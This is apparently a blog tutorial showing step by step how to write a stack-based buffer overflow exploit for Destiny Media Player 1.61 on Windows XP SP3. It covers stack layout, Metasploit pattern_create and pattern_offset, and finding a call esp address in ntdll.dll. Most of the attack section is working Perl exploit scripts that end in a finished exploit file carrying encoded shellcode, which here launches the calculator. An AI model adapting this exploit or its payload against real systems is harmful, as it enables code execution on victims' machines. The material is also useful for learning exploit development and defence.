[http://www.secsavvy.com] How to write buffer Overflow Exploit?

Today, I will show you how to develop your own exploit from scratch or modify exploit to run on different OS. For this purpose,  I have found a Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit from Exploit-db which works fine on Windows XP Pro SP2(Language pack: English) but it didn’t work on Windows XP Pro SP3(Language pack: English).



Stack Based Overflow Exploit Theory

What is Stack??

Stack is data structure which follows Last in First Out(LIFO). Stack contains local variable, function info and other details.
There are two operation possible on stack PUSH and POP.
Example:

Initial state of stack
_______________
|______2________| <—-Top
|______3________|
|______4________| <—- Bottom Suppose we Push 1 on to the stack , then the stack looks like as shown below:
_______________
|______1________| <—-Top
|______2________|
|______3________|
|______4________| <—-Bottom
Then we do a single POP operation, 1 is popped out from the stack.
_______________
|______2________| <—-Top
|______3________|
|______4________| <—-Bottom
Again when we do a single POP operation, 2 is popped out from the stack.
_______________
|______3________| <—-Top
|______4________| <—- Bottom



This is a typical layout of stack when functions call are made in the program.

|_____________________| Lower memory Address
| Local Variable                  |
|_____________________|
| Exception Handler             |
|_____________________|
| EBP                                  |
|_____________________|
|Function Return Address   |
|_____________________|
|Function Parameters         |
|_____________________|<—-Bottom (Higher memory Address)



Consider this C Code

^?View Code C

1 2 3 4 5 6 7 8 9

void DemoFunction(int parameter1, int parameter2) { int localvar = 3; } int main() { DemoFunction(1,2); return 0; }

Stack looks like as shown below for this C code:

|_______________|
|______3________|
|______EBP______|
|______EIP______|
|______1________|
|______2________| <—-Bottom

So when functions call are made then parameters of function, EIP EBP register and  local variable of function pushed onto to the stack. When function return then saved EIP is popped from the stack and put back into EIP and normal execution of program continues.

Note: Instruction Pointer(IP) register points to the memory address which the processor will next attempt to execute.

In the case of Buffer overflow, we overwrite the parameters, EIP and EBP. When function return EIP is popped from the stack and it contains the value which we have overwritten.  So by changing the value of EIP during overflow we change the normal execution of program and we can point EIP to our code address.



Tools Needed

1.WinDbg : Windows Debugger
Install Windbg  (Full install) ,open cmd and change the current directory to “C:\Program Files\Debugging Tools for Windows (x86)”  and type windbg -I .
Open windbg, go to File–> Symbol File Path and enter “SRV*C:\symbols*http://msdl.microsoft.com/download/symbols”(C:\symbols is path of directory)
2.Perl : Strawbery perl for windows platform
3.Metasploit : Metasploit Framework
4. Download all the perl code used in this tutorial from this link.
So , let start to get our hand dirty..



Verify the exploit

1. Download Destiny Media Player 1.61 from this link.
2. Install this program on Windows XP Pro SP3.(exploit-db exploit works fine on XP SP2 En but it didn’t work on XP SP3).
3. Open notepad and write down the perl code as shown below:

^?Download Exploit1.pl

1 2 3 4 5 6

my $file="radio1.rdl"; my $junkA="A"x4500; open($FILE, ">$file"); print $FILE $junkA; close($FILE); print "rdl File Created successfully\n";

4. Save the file with name Exploit1.pl.
5. Open command prompt and enter perl Exploit1.pl.

6. This perl script creates the radio1.rdl with 4500 A character, when we double the click it opens in Destiny Media Player and application crashes.
So, now we will start our exploit development.



Step 1

Click radio1.dll , it will open Windows debugger( or if you see debug button click on it).

We can see that EIP is overwriten with 41414141 (AAAAA) so due to overflow EIP(4 bytes)  is overwritten and so we can control the execution of program by modifying the value in EIP. But we don’t know the size of our buffer to exactly overwrite EIP with our own address.
Tip: Press q in command line in WinDbg to quit.

Step 2

1. Open notepad and write down the perl code as shown below:

^?Download Exploit2.pl

1 2 3 4 5 6 7 8 9

my $file="radio2.rdl"; my $junkA="A"x4000; my $junkB = "B"x500; open($FILE, ">$file"); # . concat the two variable # file contains 4000 A's then 500 B's print $FILE $junkA.$junkB; close($FILE); print "rdl File Created successfully\n";

2. Save the file with name Exploit2.pl.
3. Open command prompt and enter perl Exploit2.pl.
4. Double click the generated radio2.rdl file, it opens windows debugger.

But now EIP is overwritten with 42424242(BBBB) so now we know that the EIP has offset between 4000 and 4500 buffer size. When we dump esp using d esp command we are able to see remaining B’s.

Step 3

Now we will find the exact offset in our buffer to overwrite EIP with Metasploit.
1. Open cygwin shell. Go to All Programs–> Metasploit 3–> Cygwin Shell.
2. Change the directory to msf3/tools
3. Create a pattern for 500 characters using pattern_create.rb ruby script as shown below.

$ cd ../../msf3/tools
$ ./pattern_create.rb 500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5
Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A
f2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah
9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9
Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6
An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2A
q3Aq4Aq5Aq

4.  Open notepad and copy this perl code.

^?Download Exploit2.pl

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

my $file="radio3.rdl"; my $junkA="A"x4000; # . is used for concatenation my $junkB="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9". "Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9". "Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9". "Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9". "Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9". "Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9". "Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9". "Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9". "Aq0Aq1Aq2Aq3Aq4Aq5Aq"; open($FILE, ">$file"); print $FILE $junkA.$junkB; close($FILE); print "rdl File Created successfully\n";

5. Save this file as Exploit3.pl.
6. Open command prompt and enter perl Exploit3.pl.
7. Double click the generated radio3.rdl file, it opens windows debugger.

8. EIP is overwritten with 41346f41, now we will use Metasploit tool pattern_offset to calculate size of buffer to overwrite EIP.
9. Open cygwinshell and run the ruby script as shown below

Administrator@pc /msf3/tools
$ ./pattern_offset.rb 41346f41 500
432

10. Now if we will construct our buffer as 4000 + 432 A’s and “BBBB” then BBBB will overwrite EIP.
Buffer look like
[AAAAAAA ...... ][BBBB][CCCC....]
4432 A’s EIP 500 C’s
11. Open notepad, copy this perl code and save this file as Exploit4.pl. .

^?Download Exploit4.pl

1 2 3 4 5 6 7 8

my $file="radio4.rdl"; my $junkA="A"x4432; my $eip="BBBB"; my $junkC="C"x500; open($FILE, ">$file"); print $FILE $junkA.$eip.$junkC; close($FILE); print "rdl File Created successfully\n";

12. Open command prompt and enter perl Exploit4.pl.
13. Double click the generated radio4.rdl file, it opens windows debugger.

EIP is overwritten with 4 B’s(42424242) so now we know the exact position in our buffer and esp is overwritten with C’s. We can put our shellcode instead of C’s and overwrite EIP to jump to the esp address.. But we don’t know exactly where first C start. So let’s find it out by changing the perl script.

Step 4

1. Open notepad and copy this perl code and save it as Exploit5.pl

^?Download Exploit5.pl

1 2 3 4 5 6 7 8

my $file="radio5.rdl"; my $junkA="A"x4432; my $eip="BBBB"; my $junkC="A1234567890123456789B1234567890123456789C1234567890123456789D1234567890123456789E123456789F123456789G"; open($FILE, ">$file"); print $FILE $junkA.$eip.$junkC; close($FILE); print "rdl File Created successfully\n";

2 . Execute this perl script which creates radio5.rdl and double click the radio5.rdl and it open WinDbg.

In this case it starts exactly at start of esp at  00313c4c but if it doesn’t start then we need to put some NOP( no operation ) before shellcode.

Step 5

1. We can easily generate shellcode with Metasploit. For more details to generate shellcode watch this Video tutorial.

# windows/exec – 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = “\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1″ .
“\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30″ .
“\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa” .
“\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96″ .
“\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b” .
“\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a” .
“\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83″ .
“\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98″ .
“\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61″ .
“\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05″ .
“\x7f\xe8\x7b\xca”;

2. So perl code with shellcode

^?Download Exploit6.pl

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

my $file="radio6.rdl"; my $junkA="A"x4432; my $eip= "BBBB";   # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";   open($FILE, ">$file"); print $FILE $junkA.$eip.$shellcode; close($FILE); print "rdl File Created successfully\n";

3. Shellocde start at ESP so we can overwrite eip with the address of jmp esp or call esp etc. instruction and jump to our shellocode.
4. Generally we should find address to overwrite EIP in application dll as it make the exploit stable but in this case there is no application dll loaded. so, we will find address in OS dll like ntdll.dll,kernel32.dl,user32.dll etc.
5. For diiferent type of tools available to find address to overwrite EIP you can read this post How to find addresses to overwrite EIP??
6. I will use findjmp2 to find address in ntdll.dll

C:\Documents and Settings\Administrator\Desktop>findjmp.exe ntdll.dll esp
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning ntdll.dll for code useable with the esp register
0x7C914663 call esp
0x7C919DB0 push esp – ret
0x7C95311B call esp
0x7C9676E2 pop esp – pop – retbis
Finished Scanning ntdll.dll for code useable with the esp register
Found 4 usable addresses

7. Now we can finalize our exploit with address 0x7C914663

^?Download Exploit6.pl

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

# Exploit for Destiny Media Player Version 1.61.0 # Tested On windows XP Sp3(En) # Wriiten by Ayush (www.secsavvy.com)   my $file="radio6.rdl"; my $junkA="A"x4432; my $eip= pack('V',0x7C914663);   # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";   open($FILE, ">$file"); print $FILE $junkA.$eip.$shellcode; close($FILE); print "rdl File Created successfully\n";

8. Double click radio6.rdl it launches calculator.
Congratz!!! You have successfully written exploit for Destiny media Player.
At last , I will thank Peter Van Eeckhoutte for excellent tutorial series on Exploit Writing.  If you are more interested on writing then you must visit Peter Van Blog for Exploit Writing tutorial.